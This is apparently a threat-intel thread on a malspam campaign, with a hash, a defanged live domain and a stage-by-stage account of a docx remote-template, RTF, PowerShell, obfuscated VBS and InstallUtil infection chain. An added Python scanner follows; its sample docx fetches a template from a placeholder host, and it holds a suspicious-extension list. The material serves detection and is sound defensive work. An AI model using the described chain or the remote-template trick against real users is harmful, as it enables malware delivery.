#malspam detected in-the-wild by @BitDamSecurity

sha1: 1bcd89984728250924bb51d01550a79819512d6d
missed by O365 ATP (TTD: 8h)
Live: https://bitdam.com/email_blind_spots_study/

#ThreatIntel #infosec #IOC
@malwrhunterteam
@JAMESWT_MHT
@reecdeep
@ActorExpose
@abuse_ch
The docx has a rels entry that gets a "wbk" file from http://office-archive-index[.]com. The wbk is actually an RTF. The website is still active, btw.
The RTF file (43d930ddf0af21abde85d14d70c689599b8954ad) executes PowerShell to run putin.vbs. The vbs is heavily obfuscated.
The vbs downloads attack.jpg, which is a very long string that decodes into a PowerShell command which installs the malware using InstallUtil.exe.
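The first link in the chain above is a docx whose relationship (.rels) part points at a remote file. A defender can catch that stage before anything is fetched by unpacking the docx and listing every relationship with TargetMode="External", then checking the fetched content by magic bytes rather than trusting its extension (the thread notes the "wbk" is really an RTF). The following scanner is an added example, not code from the original thread or from BitDam; the sample docx it builds, the URL http://example.invalid/archive.wbk and the helper names (`external_relationships`, `classify`, `scan`, `is_rtf`, `build_sample_docx`) are all constructed for illustration.

```python
"""Flag external relationship targets inside a .docx and sniff fetched payloads.

Added detection example (not the original thread's code). The docx below is
constructed in memory; its remote URL is a placeholder, not the real IoC.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Extensions that should essentially never be pulled from a remote host by a document.
SUSPICIOUS_EXT = {".wbk", ".rtf", ".dot", ".dotm", ".hta", ".vbs", ".ps1", ".exe", ".jpg"}


def external_relationships(docx_bytes):
    """Return (rels_part, rel_type, target) for every relationship marked TargetMode="External"."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found


def classify(target):
    """Verdict for one relationship target: local part, plain remote URL, or remote with a risky extension."""
    parts = urlsplit(target)
    if parts.scheme.lower() not in ("http", "https", "ftp", "file"):
        return "local"
    ext = re.search(r"(\.[A-Za-z0-9]+)$", parts.path)
    if ext and ext.group(1).lower() in SUSPICIOUS_EXT:
        return "remote-suspicious-ext"
    return "remote"


def scan(docx_bytes):
    """Full scan: every external relationship with its verdict."""
    return [(part, target, classify(target)) for part, _type, target in external_relationships(docx_bytes)]


def is_rtf(data):
    """Content check for a fetched blob: RTF always starts with '{\\rtf', whatever its extension says."""
    return data.lstrip().startswith(b"{\\rtf")


def build_sample_docx():
    """Construct a minimal docx whose settings rels attach a template from a remote host (sample data)."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        "</Types>"
    )
    settings = (
        '<?xml version="1.0"?>'
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>'
    )
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}styles" Target="styles.xml"/>'
        # Remote template fetch: the pattern the thread describes, with a placeholder URL.
        f'<Relationship Id="rId2" Type="{OOXML_REL}attachedTemplate" '
        'Target="http://example.invalid/archive.wbk" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, target, verdict in scan(build_sample_docx()):
        print(f"{verdict:24} {part} -> {target}")
    # A constructed RTF header passes the content check regardless of the .wbk name.
    print("fetched blob is RTF:", is_rtf(b"{\\rtf1\\ansi\\deff0 sample}"))
```

Run it against a real sample with `scan(open("file.docx", "rb").read())`; any `remote-*` verdict is worth a block or a sandbox detonation, and `is_rtf` on whatever the URL serves tells you whether the "wbk" is a disguised RTF as in this campaign.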